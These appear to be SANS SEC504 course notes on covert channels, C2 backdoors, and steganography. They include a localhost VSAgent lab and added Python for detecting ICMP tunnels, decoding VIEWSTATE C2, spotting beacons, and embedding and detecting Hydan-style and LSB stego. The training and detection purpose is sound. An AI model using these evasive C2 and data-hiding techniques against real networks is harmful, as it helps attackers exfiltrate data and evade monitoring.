From a network perspective, only ping packets (with the TCP packet as the payload) are being sent. The Ptunnel proxy then de-encapsulates the TCP packet and forwards it to its ultimate destination simply using TCP. Likewise, the Ptunnel proxy encapsulates any responses that come back from that destination into ICMP Echo Reply packets, forwarding them back to the client.
The Ptunnel proxy can be configured to authenticate the Ptunnel client, using an MD5-based challenge/response authentication algorithm. Currently, Ptunnel does not support encryption. However, if the application using the TCP-based connection encrypts the data (such as HTTPS or SSH), the attacker would have some degree of protection of the data.

Covert Channels in TCP and IP Headers:

- why not just create a covert channel using extra space in the TCP or IP header?
- Covert_TCP is one tool that implements a covert channel using either the TCP or IP header.

Extending the Ideas of Covert_TCP:
• Transfer Trojan Horse backdoor commands or a shell instead of just files
• Bi-directional bounce attack
• Use other fields in the TCP, IP, and ICMP headers
— Reserved space
— IP options
— ICMP message type

Other Covert Channels:
• Just about any protocol can be used as a covert channel
— DNSCat2 by Ron Bowes and numerous other malware specimens
• Quick UDP Internet Connections (QUIC)
— Use of multiplexed UDP connections for connections
• Stream Control Transmission Protocol (SCTP)
— Also uses multi-streaming to send data across multiple concurrent connections
— Supports multihoming so multiple endpoints can be used as failover
— Yeah, this means it has built-in C2 server failover
• The goal of attackers using odd protocols for transfer is to find new areas where existing signatures do not exist
• Also, there are some issues with reassembly across multiple concurrent streams of data being sent.

Full C2 backdoor where all Command and Control traffic flows over Gmail.
• Originally created by Ben Donnelly of BHIS
• Currently maintained by byt3bl33d3r
• Supports:
— Command execution
— Screenshots
— Download and upload of files
— Keylogging
— Execution of shellcode
• Bypasses many DLP/IDS/IPS systems
• Many IDS/IPS/Firewalls are not monitoring Gmail traffic very well

Covert Channel Defenses (I):
• Preparation
— Keep attackers off system in the first place
• Identification
— Know what processes should be running on your systems
• When a strange process starts running, investigate
• Especially if it has admin/root privileges
— Network-based IDS can analyze packets for:
• Shell commands in HTTP (for reverse www shell)
• Unusual data in ICMP messages (for ICMP tunnels)
— false positives associated with network management equipment
• Unusual changes in IP ID and Seq/Ack fields (for Covert_TCP) — pretty hard to do.
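The Ptunnel walkthrough above describes what a sensor sees (ping packets with TCP inside), and the identification bullet here says to look for unusual data in ICMP messages. The block below is an added example (not course material and not Ptunnel's code) that builds both sides of such an exchange with plain struct packing and then runs two sensor-side checks over the capture: an echo request whose data is not a stock ping fill, and an echo reply whose data is not a copy of the request it answers, which RFC 792 requires of a genuine echo and which a tunnel cannot satisfy because the reply carries the server's response. The capture, identifiers and the pretend TCP bytes are constructed; the stock fill patterns are the well-known Linux iputils and Windows ping defaults.

```python
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8


def icmp_checksum(data):
    """RFC 1071 ones-complement sum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(kind, ident, seq, payload):
    """Serialize an ICMP echo request/reply: type, code, checksum, identifier, sequence, data."""
    header = struct.pack("!BBHHH", kind, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", kind, 0, csum, ident, seq) + payload


def parse_echo(packet):
    kind, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": kind, "code": code, "id": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": icmp_checksum(packet) == 0}


# Stock ping payloads: Linux iputils sends a 16-byte timeval followed by the byte pattern
# 0x10..0x37 (56 bytes total); Windows ping sends 32 bytes of "abcdefghijklmnopqrstuvwabcdefghi".
LINUX_FILL = bytes(range(0x10, 0x38))
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"


def matches_ping_template(payload):
    return (len(payload) == 56 and payload[16:] == LINUX_FILL) or payload == WINDOWS_FILL


def analyze_icmp(packets):
    """Sensor-side tunnel heuristics. Findings are (id, seq, reason) tuples."""
    findings, pending = [], {}
    for raw in packets:
        p = parse_echo(raw)
        key = (p["id"], p["seq"])
        if p["type"] == ECHO_REQUEST:
            pending[key] = p["payload"]
            if not matches_ping_template(p["payload"]):
                findings.append(key + ("request payload is not a stock ping fill",))
        elif p["type"] == ECHO_REPLY and key in pending and pending[key] != p["payload"]:
            findings.append(key + ("reply payload differs from the request it answers",))
    return findings


def sample_capture():
    """Constructed traffic: one Linux ping, one Windows ping, then a Ptunnel-style pair in
    which the request carries a TCP segment outbound and the reply carries the response."""
    linux = struct.pack("!QQ", 1577361600, 123456) + LINUX_FILL
    tunneled_out = b"\x00\x50\x1f\x90" + b"GET / HTTP/1.0\r\n\r\n"      # pretend ports + data
    tunneled_back = b"\x1f\x90\x00\x50" + b"HTTP/1.0 200 OK\r\n\r\n"
    return [
        build_echo(ECHO_REQUEST, 0x1234, 1, linux),
        build_echo(ECHO_REPLY, 0x1234, 1, linux),
        build_echo(ECHO_REQUEST, 0x0001, 7, WINDOWS_FILL),
        build_echo(ECHO_REPLY, 0x0001, 7, WINDOWS_FILL),
        build_echo(ECHO_REQUEST, 0xBEEF, 42, tunneled_out),
        build_echo(ECHO_REPLY, 0xBEEF, 42, tunneled_back),
    ]
```

The template check on its own produces the false positives the slide warns about (network-management gear and custom monitoring send their own fills); the request/reply mismatch is the stronger signal, because a real echo responder never rewrites the data.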

Lab: Covert Channels:

Plain Sight Covert Channels
• Not all backdoors use plaintext to transmit data
• Many use other protocols
— HTTPS
• Others hide in plain sight
— For example, HTTP

• Every custom web application has data and fields that are encoded and transmitted differently
- For example, session parameters, hidden form elements, etc.
• It is almost impossible for full inspection of all these different variables
• Let’s take a look at a backdoor that uses this technique
• It also beacons at 30-second intervals
- a very common technique for modern malware.

VSAgent (I):
• Custom backdoor written by the Black Hills Information Security team
— Special 504 version written by Luke Baggett
• Encodes all Command and Control (C2) in base64
• Then, inserts it into a VIEWSTATE parameter
• The encoded data is sent in the clear
• Very difficult to detect

If, for any reason, you need to remove results from a previous session please feel free to run the following command and restart vsagent:
# rm /opt/course_www/SEC504/vsagent-504/data.db

VSAgent (II):
root@slingshot# python /home/sec504/CourseFiles/vsagent-504/ http://127.0.0.1/SEC504/vsagent-504/vssvc.php

Open another prompt and
sec504@slingshot:~$ firefox

Now, we will use Firefox to connect to the web UI for VSAgent.

#tcpdump -i lo -s0 -A host | grep VIEWSTATE

Lab: Covert Channels
• Run some commands and decode the data
• Hints:
— The data is base64 encoded
— There are percent-encoded (hex) characters (e.g., linefeed as %0A, = as %3D), which can pollute the decoding of the base64 data
• The offending characters will need to be removed or converted!
• awk gsub is your friend!
— $ echo cat dog dog | awk '{gsub(/cat/,"dog")}1'
— Will output dog dog dog
• base64 --decode will decode the data
• It should look something like this:
— $ echo <paste your string here> | <awk command here> | <base64 decode here>
• But, there is more than one path!
— Ruby! Python! Perl!
• Don’t forget to use the man pages!!

One Possible Solution:
root@slingshot:~# echo eyJjb%1tYW5kcyI6IFtdLCAiYWUThnQiOiAiMDA6MGM6Mjk6Nzk6M%U6NTkifQ3D%3D | awk '{gsub(/%0A/,""); gsub(/%3D/,"=")}1' | base64 --decode
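The awk/base64 pipeline is one of the "more than one path" options the lab mentions; the block below is the Python path, added here as an example (not course material and not VSAgent's code). It builds a request body the way the lab describes (JSON, base64 with line feeds, then percent-encoded into a VIEWSTATE-style form field), undoes the percent-encoding, strips the line feeds that break the decoder, and parses the result; a second pair of functions measures how regular a client's request timing is, the 30-second beaconing the lab points out. The message contents, the field name, and the request times are constructed; the JSON layout is an assumption for the example, not VSAgent's wire format.

```python
import base64
import json
import statistics
from urllib.parse import quote, unquote

# Constructed C2 message; the JSON layout is an assumption for the example.
SAMPLE_MESSAGE = {"agent": "00:0c:29:aa:bb:cc", "commands": ["whoami", "uname -a", "netstat -nat"]}


def build_sample_body(message):
    """Encode as the lab describes: base64 with a line feed every 76 chars, then percent-encoded
    into a form field, so '\\n' becomes %0A and '=' padding becomes %3D."""
    wrapped = base64.encodebytes(json.dumps(message).encode()).decode()
    return "__VIEWSTATE=" + quote(wrapped, safe="") + "&__EVENTTARGET="


def extract_field(body, name="__VIEWSTATE"):
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def decode_viewstate(body):
    """The slide's awk + base64 pipeline as code: undo the percent-encoding, drop the
    line feeds that pollute the base64, then decode and parse the JSON."""
    raw = extract_field(body)
    if raw is None:
        raise ValueError("no __VIEWSTATE field in request body")
    cleaned = "".join(unquote(raw).split())      # %0A -> '\n' -> removed; %3D -> '='
    return json.loads(base64.b64decode(cleaned, validate=True))


def beacon_regularity(timestamps, tolerance=1.0):
    """Median inter-request gap (seconds) and the share of gaps within `tolerance` of it.
    A person browsing produces scattered gaps; a 30-second beacon produces near-identical ones."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    median = statistics.median(gaps)
    share = sum(abs(g - median) <= tolerance for g in gaps) / len(gaps)
    return median, share


def looks_like_beacon(timestamps, min_share=0.8):
    return beacon_regularity(timestamps)[1] >= min_share


# Constructed request times (seconds) for one client: an implant checking in every ~30 s
# with a little jitter, next to a person clicking around a site.
BEACON_TIMES = [0.0, 30.2, 59.9, 90.1, 120.0, 150.3, 179.8]
BROWSING_TIMES = [0.0, 3.0, 4.0, 40.0, 41.0, 95.0]
```

The decoder deliberately uses unquote rather than a form parser: form parsers turn "+" into a space, and "+" is part of the base64 alphabet, so a generic parser silently corrupts the payload in exactly the way the slide's "offending characters" hint describes.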

In Conclusion
• Detecting and decoding covert channels can be hard
• However, with a little work, we can peer into the commands of the bad guys
• Please try out this tool at work
— With permission, of course
• You can convert the Python script to a .exe with tools like pyInjector, pyinstaller, and py2exe.

You can convert the Python into a .exe and get real fancy with tools like pyinstaller, pyInjector, and py2exe. The following link is an article on how to do this by Mark Baggett (Luke's dad):

Covert Channel Defenses:
• Containment
— Delete attacker’s program
— Look for program on other systems
• Eradication
— If attacker compromised admin/root account, rebuild
• Recovery
— Monitor system very closely


Steganography (Stego):
• Steganography abbreviated as stego, not to be confused with stenography
• Involves concealing the fact that you are sending “sensitive” information
• Data hiding
• Can hide in a variety of formats
- Images
— Word documents
— Text documents
— Machine-generated images
(fractals, complex words of animals/flowers/people...)

Sample Stego Tools:
• The following are some example programs:
— Jsteg — hides in jpeg images using the DCT coefficients
— MP3Stego — hides in mpeg files
— S-Mail — hides data in exe and dll files
— Invisible Secrets — hides data in banner ads that appear on websites
— Stash — hides data in a variety of image formats
— Hydan — hides data in UNIX/Linux and Windows executables

More Stego Tools:
• There are a number of excellent tools for hiding data in a variety of different formats
• OpenStego — Embeds data and digital watermarks into images
• SilentEye — Embeds encrypted data and other files into JPEG, BMP, and WAVE formats
• OpenPuff — Great support for images, audio, video, and Adobe Flash files
— Also supports multiple passwords
— Plausible deniability
— Multiple rounds of encryption with different algorithms
• For additional stego tools, check out the following site:

Stego Example — Hydan:
• Hydan hides data in executables written for i386
— Written by Rakan El-Khalil
— Supports *BSD, Linux, and WinXP
• Start with an executable, as well as message to hide
• Feed both through Hydan
• Hydan encrypts the data with blowfish with user-provided passphrase, and then embeds the data
• Result: one executable, same size
• Take the resulting executable... it’ll still run
• However, by sending it back through Hydan, the original message can be recovered.

How Hydan Hides Info:
• First off, it just encrypts the message using blowfish
• Next, it uses polymorphic coding techniques to hide the data
• Hydan has several groups of functionally equivalent instructions
— Add X, Y versus Sub X, -Y
• By choosing an instruction from one group, we get a “zero” bit
• By choosing an instruction from another group, we get a “one” bit
• Just encode all the bits like that!
• Then, rewrite the polymorphic executable.

Efficiency Rate and Detection:
• Hydan can hide one byte of data in approximately 150 bytes of code
• It does alter the statistical pattern of instructions in a program
— Think about how often you subtract a negative number (X minus -22)
— Usually, you just add (X plus 22)
— Therefore, there's a possible signature here...
• Consider a histogram of instructions and how it would change
• Craig S. Wright developed a tool for detecting these anomalies to identify “Hydanized” executables
— Described at
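The two slides above explain Hydan's trick (pick between functionally equivalent instruction forms to encode bits) and why it leaves a statistical signature (negative immediates where a compiler would never emit them). The block below is an added toy model of that idea, not Hydan's code and not Wright's detector: a listing is a list of (mnemonic, destination, immediate) tuples, add/sub-immediate instructions are the carriers, a 0 bit keeps the compiler's natural form and a 1 bit swaps to the equivalent "unnatural" one, and the detector statistic is the share of carriers found in the unnatural form. The blowfish step and real binary rewriting are left out; the listing and message are constructed.

```python
# A listing is a list of (mnemonic, destination, immediate) tuples, e.g. ("add", "eax", 22).
# Only add/sub with an integer immediate are carriers; everything else passes through untouched.


def _delta(instr):
    """Net effect of an add/sub immediate as a signed number, or None if not a carrier."""
    op, _, imm = instr
    if op not in ("add", "sub") or not isinstance(imm, int):
        return None
    return imm if op == "add" else -imm


def _natural(instr):
    """The form a compiler normally emits: positive immediates, add for +, sub for -."""
    d = _delta(instr)
    return ("add", instr[1], d) if d >= 0 else ("sub", instr[1], -d)


def _unnatural(instr):
    """The functionally equivalent form with a negative immediate (X plus 22 becomes X minus -22)."""
    d = _delta(instr)
    return ("sub", instr[1], -d) if d >= 0 else ("add", instr[1], d)


def carriers(listing):
    return [i for i, ins in enumerate(listing) if _delta(ins) is not None]


def text_to_bits(text):
    return [(byte >> k) & 1 for byte in text.encode() for k in range(7, -1, -1)]


def bits_to_text(bits):
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(map(str, bits[i:i + 8])), 2))
    return out.decode(errors="replace")


def embed(listing, text):
    """Rewrite each carrier to its natural form for a 0 bit and its unnatural form for a 1 bit;
    the program's behaviour is unchanged, only the instruction choice moves."""
    bits, slots = text_to_bits(text), carriers(listing)
    if len(bits) > len(slots):
        raise ValueError("listing carries %d bits, message needs %d" % (len(slots), len(bits)))
    out = list(listing)
    for bit, idx in zip(bits, slots):
        out[idx] = _unnatural(listing[idx]) if bit else _natural(listing[idx])
    return out


def extract(listing, nbits):
    bits = [0 if listing[i] == _natural(listing[i]) else 1 for i in carriers(listing)]
    return bits_to_text(bits[:nbits])


def unnatural_ratio(listing):
    """Detector statistic: share of add/sub-immediate instructions in the unnatural form.
    Compiler output sits near zero; a listing carrying random-looking bits sits near 0.5."""
    idx = carriers(listing)
    return sum(listing[i] != _natural(listing[i]) for i in idx) / len(idx) if idx else 0.0


def is_suspicious(listing, threshold=0.1):
    return unnatural_ratio(listing) > threshold


# Constructed listing: a prologue, 24 stack adjustments (the carriers), and a return.
SAMPLE_LISTING = ([("push", "ebp", None), ("mov", "ebp", "esp")]
                  + [("add", "esp", 4 * k) for k in range(1, 13)]
                  + [("sub", "esp", 8 * k) for k in range(1, 13)]
                  + [("ret", None, None)])
```

Hydan's own figure of roughly one byte per 150 bytes of code is the same capacity problem in miniature: the message can only be as long as the number of carriers allows, and every carrier used for a 1 bit is another negative immediate for the histogram to count.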

Detecting Stego:
• StegExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques were used
— This kind of stego modifies the least significant bits, which determine color
— This leads to a very slight (think imperceptible) change of color made to the original image
• Supports a number of different “detectors” or mathematical analysis techniques to detect stego
• For quick analysis, it can also use “cheap” or quick analysis methods to detect the presence of stego
• Has the ability to run on a large number of files very quickly
• It can be found here:

Defending Against Stego (I):
• Preparation
— Get familiar with stego tools
— Look for changes to critical web server files (file integrity-checking tools)
• Identification
— If you have the original source image, detection is easy
• Perform a diff or file comparison and see whether they are different
• MD5 or SHA-1 hashes can help
• Stego might not change the size or make any observable changes, but it does change the data
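The last three bullets make a concrete claim: stego leaves the size alone but changes the data, so with the original in hand a hash or a diff settles it. The block below is an added example (not course material and not any of the listed tools) that shows this on a constructed 8-bit cover: it embeds a message in the least significant bits, then reports what the comparison step sees (same size, different hash, which samples changed and that every change is confined to the low bit) and recovers the message from the low bits.

```python
import hashlib

# Constructed cover: 4096 samples of a smooth gradient, standing in for an 8-bit image.
COVER = bytes((i // 4) & 0xFF for i in range(4096))


def embed_lsb(image, message):
    """Write the message bits into the least significant bit of consecutive samples.
    The output has exactly the cover's size, which is why a size check alone misses it."""
    bits = [(b >> k) & 1 for b in message for k in range(7, -1, -1)]
    if len(bits) > len(image):
        raise ValueError("cover too small for message")
    out = bytearray(image)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def extract_lsb(image, nbytes):
    """Read `nbytes` back out of the low bits."""
    return bytes(sum((image[j * 8 + k] & 1) << (7 - k) for k in range(8)) for j in range(nbytes))


def compare_with_original(original, suspect):
    """What the 'diff against the source image' step on the slide yields."""
    changed = [i for i, (a, b) in enumerate(zip(original, suspect)) if a != b]
    return {
        "same_size": len(original) == len(suspect),
        "same_sha256": hashlib.sha256(original).digest() == hashlib.sha256(suspect).digest(),
        "changed_samples": len(changed),
        "first_change": changed[0] if changed else None,
        "last_change": changed[-1] if changed else None,
        "only_lsb_changed": all((original[i] ^ suspect[i]) == 1 for i in changed),
    }
```

Two practical notes follow from the output: the changed samples cluster at the front of the file, which is where a sequential LSB embedder starts, and a re-encoded or resized copy would change far more than the low bit, so "only_lsb_changed" is what separates stego from an innocent re-save.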

Defending Against Stego (II)

— If you are working an HR or legal case, take direction from your legal team
• Many times, this will involve watching a suspect's system for an extended period of time
• Remember S-Tools changes the number of near-duplicate colors
• Not easy to do
• Usually requires determining statistics or large number of clean files to come up with unique properties
• Containment
— Work with law enforcement and HR
• Erad, Recov: Work with your company’s legal team.

Putting It All Together:
• We've discussed each of these tools on a one-by-one basis
• The tools are seldom employed this way
• They are often used together in very elaborate schemes to effectively undermine the security of an organization
• We now go through two structured sample attacks, drawing on the ideas and tools discussed throughout the course.

Mistake Number 10:
- This scenario could be written because of the data retrieved from logs.
- The information associated with the intrusion was available, but it was not analyzed until after the damage was done.
- We need to be proactive about log analysis.

• Numerous podcasts provide in-depth information about security
— Security Weekly Podcast:
— Network Security Podcast:
— Securabit Podcast:
— Data Security Podcast: